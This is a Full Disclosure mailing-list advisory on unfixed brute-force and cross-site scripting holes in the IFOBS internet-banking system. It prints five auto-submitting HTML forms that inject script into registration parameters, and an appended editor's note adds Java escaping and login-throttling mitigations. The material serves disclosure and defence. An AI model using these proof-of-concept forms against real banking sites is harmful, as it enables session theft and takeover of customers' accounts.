Full Disclosure mailing list archives

BF and XSS vulnerabilities in IFOBS


From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 19 Sep 2012 16:41:23 +0300

Hello list!

I want to warn you about Brute Force and Cross-Site Scripting 
vulnerabilities in the IFOBS system.

IFOBS is an Internet banking system which is widespread; in particular, 
it is used by a large number of Ukrainian banks.

These are the next 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the 
first advisory there were 38 vulnerabilities).

-------------------------
Affected products:
-------------------------

All versions of IFOBS are vulnerable. The developers have ignored these 
vulnerabilities and have not fixed them (all holes from the three advisories).

----------
Details:
----------

Brute Force (WASC-11):

In the login form of the certificates console 
(http://site/ifobsClient/certmasterlogin.jsp) there is no protection against 
password guessing (captcha).

In the forms for checking registration status and editing the registration 
profile there is no protection against password guessing (captcha). Both 
forms are on the page http://site/ifobsClient/regclientmain.jsp (they can 
also be accessed at the addresses 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and 
they use the same script.

Cross-Site Scripting (WASC-08):

POST request to the page http://site/ifobsClient/regclientmain.jsp in the 
parameters: furtherAction, secondName, firstName, thirdName, BirthDay, 
BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, 
PassportDay, PassportMonth, PassportYear, passportIssueAgency, 
tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, 
CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, 
pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, 
typeclient.

Exploits for the first five vulnerabilities (in the parameters furtherAction, 
secondName, firstName, thirdName, BirthDay):

IFOBS XSS-6.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="login" value="111111">
<input type="hidden" name="id" value="1111">
<input type="hidden" name="myaction" value="login">
<input type="hidden" name="furtherAction" 
value='"><script>alert(document.cookie)</script>'>
</form>
</body>
</html>

IFOBS XSS-7.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="secondName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-8.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="firstName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-9.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="thirdName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-10.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="BirthDay" 
value='</script><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

------------
Timeline:
------------ 

2012.05.04 - found the vulnerabilities during a pentest. After I informed my 
client, he could inform the developers.
2012.05.29 - announced at my site.
2012.06.01 - informed the developers about vulnerabilities (the first 
advisory).
2012.06.01 - informed the developers about vulnerabilities (the second 
advisory).
2012.06.02 - informed the developers about vulnerabilities (the third 
advisory).
2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
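Added example (editor's note, not part of MustLive's post and not IFOBS code): the two server-side controls whose absence the advisory reports, written as plain Java so it compiles with a stock JDK. escapeHtml() shows what the reflected registration parameters (secondName, firstName, ...) look like once encoded for an HTML attribute, and escapeJsString() covers the BirthDay case, where the posted payload closes a script block, which suggests that value is reflected inside <script> (that context is inferred from the payload, not confirmed by the advisory). LoginThrottle is a minimal per-account failed-attempt limiter of the kind the certmasterlogin.jsp and regclientmain.jsp login forms lack; the class name, the threshold of 5 failures and the 15-minute window are assumptions chosen for the example.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.Map;

// Example mitigations for the issues in this advisory (assumed names, not IFOBS code).
public final class IfobsMitigations {

    // HTML attribute/body context: turns "><script>alert(document.cookie)</script>
    // into inert text. The five characters below are the ones that matter.
    public static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // JavaScript string context (the BirthDay payload ends the script block with
    // a literal "</script>"). HTML entities do not help inside <script>; every
    // non-alphanumeric character is emitted as a Unicode escape instead, so a raw
    // '<' can never reach the HTML parser.
    public static String escapeJsString(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            if (c < 128 && Character.isLetterOrDigit(c)) {
                sb.append(c);
            } else {
                sb.append(String.format("\\u%04x", (int) c));
            }
        }
        return sb.toString();
    }

    // Per-account throttle: after maxFailures failed logins within windowMillis,
    // further attempts for that login are refused until old failures age out.
    public static final class LoginThrottle {
        private final int maxFailures;
        private final long windowMillis;
        private final Map<String, Deque<Long>> failures = new HashMap<>();

        public LoginThrottle(int maxFailures, long windowMillis) {
            this.maxFailures = maxFailures;
            this.windowMillis = windowMillis;
        }

        public synchronized boolean isLocked(String login, long now) {
            Deque<Long> q = failures.get(login);
            if (q == null) return false;
            // Drop failures that fall outside the sliding window.
            while (!q.isEmpty() && now - q.peekFirst() > windowMillis) q.pollFirst();
            return q.size() >= maxFailures;
        }

        public synchronized void recordFailure(String login, long now) {
            failures.computeIfAbsent(login, k -> new ArrayDeque<>()).addLast(now);
        }

        public synchronized void recordSuccess(String login) {
            failures.remove(login);
        }
    }

    public static void main(String[] args) {
        // Payloads taken from the advisory's exploit forms.
        String attrPayload = "\"><script>alert(document.cookie)</script>";
        String jsPayload = "</script><script>alert(document.cookie)</script>";
        System.out.println("value=\"" + escapeHtml(attrPayload) + "\"");
        System.out.println("var birthDay = \"" + escapeJsString(jsPayload) + "\";");

        // Constructed scenario: five failed attempts on the login "111111"
        // (the value used in the XSS-6 form), one second apart.
        LoginThrottle throttle = new LoginThrottle(5, 15 * 60 * 1000L);
        long now = 0;
        for (int i = 0; i < 5; i++) {
            now += 1000;
            throttle.recordFailure("111111", now);
        }
        System.out.println("locked after 5 failures: " + throttle.isLocked("111111", now));
        System.out.println("locked 16 minutes later:  " + throttle.isLocked("111111", now + 16 * 60 * 1000L));
    }
}
```

The throttle is keyed on the login name rather than on the client address, because the forms in the advisory accept the login as a POST parameter and an attacker can spread attempts across many addresses; a captcha, as the advisory suggests, or a second factor would be the next layer on top of this limit. In a JSP application the two escape functions would be applied at the point where each parameter is written into the response, choosing the function by output context rather than escaping once on input.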

